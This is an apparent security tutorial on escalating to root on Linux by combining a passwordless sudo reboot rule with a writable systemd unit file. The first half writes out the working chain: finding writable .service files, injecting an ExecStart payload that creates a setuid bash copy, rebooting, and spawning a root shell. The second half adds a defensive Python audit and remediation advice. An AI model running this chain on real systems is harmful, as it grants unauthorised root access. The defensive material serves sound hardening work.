
Sudo Reboot Privilege Escalation

A sudo rule that lets a user run the reboot command as root without a password may be abusable for privilege escalation (PrivEsc).

sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot

If we can execute the "reboot" command as root, we may be able to escalate privileges.

We need to look for systemd service unit files that are writable by our user.

find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service

If we find a writable unit file, we can inject a payload into the ExecStart= line of its [Service] section.

# /etc/systemd/system/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
WantedBy=multi-user.target

Now reboot as root.

sudo /usr/sbin/reboot

After the system reboots, the command in ExecStart= is executed as root. Now we should get a root shell by running the copied bash binary with -p (so it keeps the setuid privileges).

/home/<username>/bash -p
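The audit below is an added example, not code from the original page. It checks, from the defender's side, for the two conditions the steps above chain together: a NOPASSWD sudo rule for a reboot command, and a .service unit that a non-root user could edit. The sample sudo -l output and the unit files it scans are constructed and written to a temporary directory; REBOOT_COMMANDS and UNIT_DIRS are my own lists, and a scan of the real unit directories happens only when assess() is called without a dirs argument.

```python
"""Audit for the sudo-reboot / writable-unit privilege-escalation chain.

Added example (not the page's own code). Reports a NOPASSWD sudo rule for
a reboot command and any .service file writable by group/other (or not
root-owned). Either alone is a finding; both together are the escalation
path described on the page.
"""
import re
import stat
import tempfile
from pathlib import Path
from typing import List, Optional

# Commands that cause units to be (re)started on the next boot (assumed list).
REBOOT_COMMANDS = {"/usr/sbin/reboot", "/sbin/reboot",
                   "/usr/sbin/shutdown", "/sbin/shutdown"}

# Directories the system instance of systemd loads unit files from.
UNIT_DIRS = ["/etc/systemd/system", "/run/systemd/system",
             "/usr/lib/systemd/system", "/lib/systemd/system"]

NOPASSWD_RE = re.compile(r"\(.*?\)\s+NOPASSWD:\s*(?P<cmds>.+)")

# Constructed `sudo -l` output mirroring the rule shown on the page.
SAMPLE_SUDO_L = """\
User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/sbin/reboot
"""

# Constructed unit files; the ExecStart is benign, only permissions matter.
WEAK_UNIT = ("[Unit]\nDescription=example\n\n[Service]\nType=simple\n"
             "User=root\nExecStart=/usr/bin/example-monitor\n")
HARDENED_UNIT = ("[Unit]\nDescription=hardened\n\n[Service]\nType=simple\n"
                 "User=root\nExecStart=/usr/bin/hardened-monitor\n")


def nopasswd_commands(sudo_l_output: str) -> List[str]:
    """Return the command paths granted with NOPASSWD in `sudo -l` output."""
    cmds = []
    for line in sudo_l_output.splitlines():
        m = NOPASSWD_RE.search(line)
        if not m:
            continue
        for entry in m.group("cmds").split(","):
            entry = entry.strip()
            if entry:
                cmds.append(entry.split()[0])   # keep the path, drop arguments
    return cmds


def nopasswd_reboot(sudo_l_output: str) -> List[str]:
    """Subset of NOPASSWD commands that reboot the host ('ALL' covers them)."""
    return [c for c in nopasswd_commands(sudo_l_output)
            if c == "ALL" or c in REBOOT_COMMANDS]


def exec_start_of(unit_text: str) -> Optional[str]:
    """Value of ExecStart= inside the [Service] section, or None."""
    in_service = False
    for raw in unit_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_service = (line == "[Service]")
        elif in_service and line.startswith("ExecStart="):
            return line.split("=", 1)[1]
    return None


def find_weak_units(dirs=UNIT_DIRS, require_root_owner: bool = True) -> List[dict]:
    """Report .service files a non-root user could edit.

    Mode bits are inspected instead of os.access() so the answer does not
    depend on which account runs the audit.
    """
    findings = []
    for d in dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for unit in base.rglob("*.service"):
            if not unit.is_file():
                continue
            st = unit.stat()
            reasons = []
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("writable by group/other")
            if require_root_owner and st.st_uid != 0:
                reasons.append(f"owned by uid {st.st_uid}, not root")
            if reasons:
                findings.append({"path": str(unit),
                                 "mode": oct(stat.S_IMODE(st.st_mode)),
                                 "reasons": reasons,
                                 "exec_start": exec_start_of(
                                     unit.read_text(errors="replace"))})
    return findings


def assess(sudo_l_output: str, dirs=UNIT_DIRS, require_root_owner: bool = True) -> dict:
    """Combine both checks; the chain needs both conditions to be present."""
    reboot = nopasswd_reboot(sudo_l_output)
    weak = find_weak_units(dirs, require_root_owner)
    return {"nopasswd_reboot": reboot, "weak_units": weak,
            "exploitable_chain": bool(reboot and weak)}


def demo() -> dict:
    """Run the audit on a constructed unit tree rather than a live system."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        weak = root / "example.service"
        weak.write_text(WEAK_UNIT)
        weak.chmod(0o666)      # the misconfiguration the page searches for
        good = root / "hardened.service"
        good.write_text(HARDENED_UNIT)
        good.chmod(0o644)      # expected permissions for a unit file
        # require_root_owner=False: temp files belong to the running user.
        return assess(SAMPLE_SUDO_L, dirs=[str(root)], require_root_owner=False)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Running the file prints the result for the constructed tree; on a real host, feed the captured output of sudo -l to assess() and leave dirs at its default. The fix on the unit side is to keep every unit file root-owned with mode 0644, and on the sudo side to remove the NOPASSWD reboot rule or restrict it to an account that is already trusted with root.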
